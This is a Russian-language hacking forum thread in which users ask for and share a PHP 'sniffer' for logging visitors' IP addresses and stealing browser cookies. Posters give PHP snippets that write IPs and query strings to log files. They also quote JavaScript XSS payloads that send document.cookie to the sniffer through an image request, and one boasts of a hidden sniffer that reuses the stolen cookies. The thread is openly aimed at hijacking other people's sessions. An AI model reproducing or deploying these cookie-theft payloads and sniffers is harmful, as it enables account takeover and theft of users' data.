подскажите правельный php сниф, чтоб ip записывл и куки тянул и все остальное... ну вы поняли., что по горячим следам зайти туда откуда пришли на снифер... - FriLL Web Sniffer - палится каспером - от Каника сниф - не пробовал, тож не самый простой задача в том чтоб писал лог всех кто зайдет (ip), онлайн не вариант,есть тема. я ету тему перв раз курю, не судите строго
Code: 2 файла на хост- 1)index.php <?php file_put_contents('ips.txt', $_SERVER['REMOTE_ADDR']."\r\n", FILE_APPEND); 2) ips.txt так? а если уже есть index.html ?
sozdai "sniff.php" v nego sun': <?php file_put_contents('ips.txt', $_SERVER['REMOTE_ADDR']."\r\n", FILE_APPEND); ?> vse
я писал сам себе снифф отличный. ловит данные + ип + браузер + реферер + дату лога + делает яваскрипт-линк, который активачит награбленные куки + скрыт на хостинге + есть встроенный шаблон хсс файла для биндинга с сайта )
хм... странно, где тебе такое пишет? у меня всё нормально. на чисто для ip PHP: <?php $f=fopen("sn.txt","a+"); fwrite($f,$_SERVER['QUERY_STRING']."\r\n"); fclose($f); ?>
из FAQa : Помимо вышеуказанных параметров, снифферу можно передать в запросе произвольную информацию, отделив ее знаком ?. В логе она окажется в поле QUERY. Если вам нужно перехватить cookies пользователя или иную информацию, известную только браузеру, не обойтись без использования JavaScript. Пример кода, перехватывающего cookies: <script>img=new Image(); img.src="[путь к s.gif]?"+document.cookie;</script> - как ето использовать можно пример ? как должна выглядеть ссылка на сниф ? если я просто указываю адрес до s.gif то сниф пишет в лог только ip,волшебной палочки что то не видать.
понимаю что нужна активная XSS, я не ленюсь, я просто пока не знаю что с етим делать : <script> var im1 = new Image(); im1.src="http://localhost/sniffer/snif.gif"+document.cookie; </script>